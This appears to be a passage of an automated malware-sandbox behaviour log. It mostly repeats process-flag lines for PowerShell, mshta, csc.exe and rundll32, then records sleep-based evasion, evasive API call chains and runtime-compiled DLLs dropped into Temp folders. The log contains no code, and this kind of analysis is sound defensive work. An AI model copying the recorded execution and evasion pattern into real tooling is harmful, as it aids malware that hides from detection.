            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4400Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 5638 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 3533 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep count: 5347 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328Thread sleep count: 3944 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5348Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep count: 5671 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep count: 3636 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4968Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.dllJump to dropped file
